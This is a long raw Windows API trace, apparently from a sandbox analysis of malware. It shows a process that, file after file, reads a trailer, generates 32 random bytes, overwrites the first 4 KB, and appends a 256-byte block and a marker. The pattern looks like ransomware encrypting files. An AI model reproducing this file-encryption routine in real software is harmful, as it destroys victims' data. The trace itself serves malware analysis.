1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.254] GetProcessHeap () returned 0x4f10000 [0080.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.255] GetProcessHeap () returned 0x4f10000 [0080.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.256] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.256] WriteFile (in: hFile=0x850, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.256] WriteFile (in: hFile=0x850, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.256] GetProcessHeap () returned 0x4f10000 [0080.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.256] CloseHandle (hObject=0x850) returned 1 [0080.258] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 53 [0080.258] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.258] ReadFile (in: hFile=0x854, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.258] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.258] GetProcessHeap () returned 0x4f10000 [0080.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.258] GetProcessHeap () returned 0x4f10000 [0080.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.258] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.258] GetProcessHeap () returned 0x4f10000 [0080.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.259] ReadFile (in: hFile=0x854, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.329] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.329] WriteFile (in: hFile=0x854, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.330] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.331] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.332] GetProcessHeap () returned 0x4f10000 [0080.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.333] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.334] GetProcessHeap () returned 0x4f10000 [0080.334] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.335] GetProcessHeap () returned 0x4f10000 [0080.335] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.335] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.335] WriteFile (in: hFile=0x854, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.338] WriteFile (in: hFile=0x854, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.338] GetProcessHeap () returned 0x4f10000 [0080.338] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.338] GetProcessHeap () returned 0x4f10000 [0080.339] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.339] GetProcessHeap () returned 0x4f10000 [0080.339] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.339] CloseHandle (hObject=0x854) returned 1 [0080.340] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 54 [0080.341] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.341] ReadFile (in: hFile=0x858, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.341] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.341] GetProcessHeap () returned 0x4f10000 [0080.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.341] GetProcessHeap () returned 0x4f10000 [0080.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.341] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.341] GetProcessHeap () returned 0x4f10000 [0080.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.341] ReadFile (in: hFile=0x858, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.392] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.392] WriteFile (in: hFile=0x858, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 